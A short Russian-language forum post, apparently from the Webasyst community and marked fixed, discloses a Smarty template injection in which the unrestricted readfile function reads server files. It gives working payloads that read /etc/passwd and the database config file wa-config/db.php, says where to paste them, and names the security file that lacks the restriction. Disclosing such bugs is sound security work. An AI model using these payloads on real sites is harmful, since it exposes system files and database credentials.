Уязвимость вебасист (Закрыть метод readfile) Исправлено

8

Я тут снова решил пролезть и почитать любой файлик на сервере только теперь через контент страницы, продукта, категории, в общем везде где используется смарти.


  Файл пользователей сервера - {readfile("/etc/passwd")}
  Файл соединения с базой -      {readfile("./wa-config/db.php")}

Использование:

Вставьте код в html код визуального редактора или в шаблон темы.

Уязвимость работает за счет не запрещенной функции readfile в файле /wa-system/vendors/smarty3/sysplugins/smarty_security.php

P.S не хотел отдавать, но решил что эта уязвимость мне не нужна

24 комментария

Добавить комментарий

Чтобы добавить комментарий, зарегистрируйтесь или войдите